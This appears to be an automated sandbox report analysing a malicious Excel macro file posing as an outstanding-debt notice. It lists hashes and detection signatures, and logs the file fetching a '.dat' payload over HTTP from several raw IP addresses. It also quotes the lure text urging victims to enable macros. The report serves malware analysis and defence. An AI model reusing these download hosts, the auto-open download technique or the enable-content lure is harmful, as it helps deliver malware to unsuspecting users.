Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-764934899-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-764934899-05042021.xlsm
Analysis ID:404145
MD5:9f67edc9319d6d60253c89a9341d4b91
SHA1:b7faf5582ce4306bff50fe74305df295f1f11633
SHA256:6210e0750a91de0737ad438ee0fd491915e192d141ee95bdd0aaa44fba358cd7
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2500 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.211.91.81:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.211.91.81:80
Source: Joe Sandbox ViewIP Address: 91.211.91.81 91.211.91.81
Source: Joe Sandbox ViewIP Address: 5.34.179.36 5.34.179.36
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.34.179.36Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F791B08.jpgJump to behavior
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.34.179.36Connection: Keep-Alive

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-764934899-05042021.xlsmInitial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 22 0 Once you have enabled editing please click Ena
Source: Screenshot number: 4Screenshot OCR: Enable Content button from the yellow bar above 23 24 25 26 27 28 29 30 31 32 33 34 35
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)Name: Auto_Open
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-764934899-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-764934899-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_OpenName: Auto_Open
Source: Outstanding-Debt-764934899-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal68.expl.evad.winXLSM@1/8@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Outstanding-Debt-764934899-05042021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC9A5.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-764934899-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-764934899-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-764934899-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-764934899-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-764934899-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.